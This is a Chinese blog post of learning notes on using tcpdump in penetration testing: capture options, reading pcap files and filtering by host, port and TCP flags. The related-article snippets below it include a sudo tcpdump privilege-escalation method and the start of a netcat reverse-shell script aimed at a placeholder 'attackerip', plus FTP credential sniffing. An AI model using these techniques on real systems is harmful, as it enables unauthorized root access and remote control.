渗透测试工具学习笔记(4)——tcpdump

最新推荐文章于 2024-04-18 22:10:42 发布
最新推荐文章于 2024-04-18 22:10:42 发布
阅读量344 收藏
点赞数
分类专栏: 渗透测试 文章标签: linux 渗透测试 kali manjaro tcpdump
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39700392/article/details/90454360
版权

no-GUI的抓包分析工具
Linux、Unix系统默认安装(说是这么说但是manjaro下没有,pacman一下即可)

抓包:
        默认只抓68个字节
        -i interface
        -s snaplen 大小
        -w file
        tcpdump -i eth0 -s 0 -w file.pcap
        tcpdump -i eth0 port 22 (筛选器)

读取抓包文件:
        tcpdump [-A] -r file.pcap
        -A 以ascii码显示
        -X 以十六进制显示

筛选:
        -n 不解析域名,显示IP地址
        用管道:
                tcpdump -n -r http.cap | awk'{print $3}' | sort -u
        按来源IP:
                tcpdump -n src host 145.254.160.237 -r http.cap
        按目标IP:
                tcpdump -n dst host 145.254.160.237 -r http.cap
        按端口号:
                tcpdump -n port 53 -r http.cap
                tcpdump -nX port 80 -r http.cap
        高级筛选:
                按位01转化成十进制数,规定第x个字节的值
                tcpdump -A -n 'tcp[13] = 24' -r http.cap

实用渗透测试工具集锦
weixin_30539835的博客
08-13 120
密码/HashCode 破解网站:https://www.onlinehashcrack.com/hash-cracking.php 漏洞库:https://www.exploit-db.com/ Linux 漏洞库:https://www.exploit-db.com/exploits/15285/ GoogleHackingDatabase:https://www.exploit-...
tcpdump
lyyslsw的专栏
12-30 1343
linux 普通用户默认是没有权限使用tcpdump的, 所以需要root 用户赋权: root# setcap cap_net_raw=eip /usr/sbin/tcpdump 不要为普通用户添加tcpdump的sudo权限, zhangsan ALL=(root) NOPASSWD: /usr/bin/awk, /usr/bin/less /tmp/abc.text, /us...
无线网络渗透测试系列学习(三) - [信息收集] 网络扫描基础和对三种协议(ICMP/TCP/UDP)的简单学习
曾铎的博客
03-28 782
在上一篇文章中我们对一些常见的端口进行了了解,并对在Windows下的VMware虚拟中如何搭建Metasploit 2靶机的过程进行了讲述,从这篇文章开始我们开始着重对无线网络渗透测试之前的信息收集部分进行介绍和学习。在网络技术中,通过对单个IP地址的扫描,我们可以对网络的端口开放情况有一个基本的了解;
网络渗透实验四
Mask__er的博客
12-15 1116
系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录系列文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例
sudo-tcpdump提权法
weixin_30621711的博客
02-01 618
当当前用户可以通过sudo执行tcpdump时,可以用来进行提权 tcpdump中有两个参数-z和-Z,前者用来执行一个脚本,后者用来指定tcpdump以哪个用户运行,当可以通过sudo执行时,则可以指定以root用户运行一个脚本,从而达到提权的目的 一、编写反向shell脚本 #shell.sh mknod backpipe p && nc attackerip ...
Linux_Kali网络渗透测试学习笔记总结(七)】提升权限
数据库爆破专家的博客
04-30 3013
网络渗透测试(六):提升权限 文章目录网络渗透测试(六):提升权限1.利用本地漏洞2.密码攻击2.1 离线攻击工具2.1.1 hash-dentifier2.1.2 Hashcat2.1.3 RainbowCrack2.1.4 samdump22.1.5 John2.1.6 Johnny2.1.7 Ophcrack2.1.8 Crunch2.2 在线破解工具2.2.1 CeWL2.2.2 Hydr...
一款集成化的Web渗透测试工具 DudeSuite_dudesuite测试
最新发布
2401_84264069的博客
04-18 1012
前面Web安全相关的攻击都是一些很多年的经典手法了,经过多年的发展已经相当成熟,相关的漏洞早已不如以前多,现在很多时候的攻击,都是依靠各种各样的第三方组件漏洞完成的,所以学习研究这些常见第三方组件的漏洞,一方面掌握这些攻击手法用于实战中使用,另一方面触类旁通,对从事漏洞挖掘的工作也是非常有帮助的。通过日志来发现攻击行为是一种最常见的行为,攻击者的Web请求,系统登录,暴力破解尝试等等都会被系统各种软件记录在案,攻击者得手后也经常会抹除相关的日志记录,所以学习掌握这些日志,是攻防两队的人都需要学习的技能。
渗透测试基础笔记1
weixin_43750381的博客
11-20 1298
第一天第一课科普渗透测试流程渗透测试与入侵的最大区别:渗透测试流程流程图测试环境安装配置虚拟机篇 科普 黑客: “黑客”一词是由英语**Hacker**音译出来的。他们伴随着计算机和网络的发展而产生和成长。 黑客传奇 理查德 马修 斯托曼 传统型大黑客,斯托曼在1971年受聘成为美国麻省理工学院人工智能实验室程序员 史蒂夫 沃兹尼亚克 苹果计算机创办人之一,现就职小学教师。 林纳斯 托瓦...
【安全牛学习笔记】基本工具-NETCAT(telnet/banner、传输文本信息)
edu_aqniu的博客
09-07 1336
常用工具 ​ 经常使用且功能强大 安全从业者必不可少的帮手 Nc / ncat Wireshack Tcpdump NETCAT-----NC 网络工具中的瑞士军刀——小身材、大智慧 侦听模式/传输模式 telnet/获取banner信息 传输文本信息 传输文件目录 加密传输文件 远程控制/木马
Linux无线网络渗透技术详解——无线网络抓包分析
- 无线网络渗透测试概述 - Linux平台在无线网络渗透中的应用 # 2. 无线网络基础知识回顾 - **无线网络的组成结构与工作原理** 无线网络由无线接入点(Access Point)、无线客户端设备(如手机、笔记本电脑等)和...
Manjaro安装配置Msf(Metasploit)并配置msfdb数据库
weixin_45629684的博客
07-18 1850
简介 最近更换了Manjaro作为我的主力系统,在安装常用的渗透测试工具的时候,安装msf遇到了一些问题 安装 Arch系的pacman之强早有所耳闻,但是没想到有这么强,Msf都可以直接Pacman sudo pacman -S metasploit 至此,msf就成功安装了 配置 问题就出来了msf数据库的配置上,在安装好postgresql之后,仍然无法通过msfdb进行init Missing requirement: 'bundle' does not appear to be installe
2022-渗透测试-信息收集-Metasploit(基于TCP协议)
保持微笑的博客
01-15 3093
2022-渗透测试-信息收集-Metasploit(基于TCP协议)
生命在于学习——Linux提权
易水哲的博客
11-03 1728
Linux提权的学习笔记记录。
linux_manjaro常用软件安装
江州司马
11-09 1640
安装(win10+ubuntu+新增manjaro) 参考 Windows+Manjaro双系统安装:https://blog.csdn.net/xiaoyaotan_77/article/details/84837981 唯一需要注意的是由于是uefi引导,所以,最好建立独立的fat32分区(512M),挂载点/boot/efi/,标记为/boot(如果只选择/,则manjaro会自动提示需要建立/boot/efi且标记为/boot,并且efi的分区不能使ext4),当然boot/efi其他教程说可以和
黑客与渗透测试(TCP代理)
午夜安全
06-10 1238
TCP代理在实际案例中部署简单的TCP代理可以了解未知的协议,修改发送到应用的数据包,或者为模糊测试创建一个测试环境。环境:win10、Python 2.7.15、火狐浏览器代码(出自《Python黑帽子:黑客与渗透测试》):# -*- coding:utf-8 -*- import sys import socket import threading def server_loop(local...
渗透测试9---TCP/IP包分析技术&SYN洪水攻击
初遇我ㄖ寸の热情呢?
04-14 7991
了解http包的基本构造 HTTP请求的典型场景: …. 网络流量分析的目的: 监控网络流量 排除网络问题 入侵检测 更好的理解协议 wireshark捕获接口配置: 混杂模式:监听模式,在这个网段里面所有包的情况,包括广播包。 过滤表达式的规则 ip.src == 192.168.1.102 (src:source发起方) ip.dst == 192.1...
python渗透测试入门之TCP代理
ailx10
06-02 395
近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第2个实验(开发一个TCP代理),我的测试环境是mbp电脑+kali虚拟机+centos虚拟机+conda开发环境。我测试了明文传输的FTP代理和加密传输的SSH代理,涉及到3方:1是mbp上跑的代理程序,2是kali上跑的ftp服务,3是centos上跑的ftp客户端,成功验证了mbp上的代理程序相...
Linux命令tcpdump安装步骤以及使用方法
weixin_46591429的博客
02-18 4376
准备工作: 1、安装flex yum -y install flex 2、安装bison yum -y install bison 安装tcpdump: wget http://www.tcpdump.org/release/libpcap-1.5.3.tar.gz wget http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz tar -zxvf libpcap-1.5.3.tar.gz cd libpcap-1.5.3 ./configure sudo
tcpdump抓包ftp协议_tcpdump抓取ftp传送用户名和密码案例
weixin_39715538的博客
12-19 614
当我们使用tcpdump在Router上面监听明文的传输数据时,例如FTP传输协议,你觉得会发生什么问题呢?我们先在主机端执行“tcpdump -i lo port 21 -nn –X”,然后再以FTP登录本机,并输入账号与密码,结果你就可以发现如下的状况:[root@linux ~]# tcpdump -i lo -nn -X 'port 21'0x0000: 4500 0048 2a28 4...
抓包改包工具在渗透测试中的应用
资源摘要信息:"抓包改包相关渗透测试软件是指那些能够对网络数据包进行捕获、分析、修改和重新发送的一类软件工具。这些工具主要用于网络安全测试、系统漏洞评估以及数据恢复等领域。在网络安全中,抓包改包工具能够...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值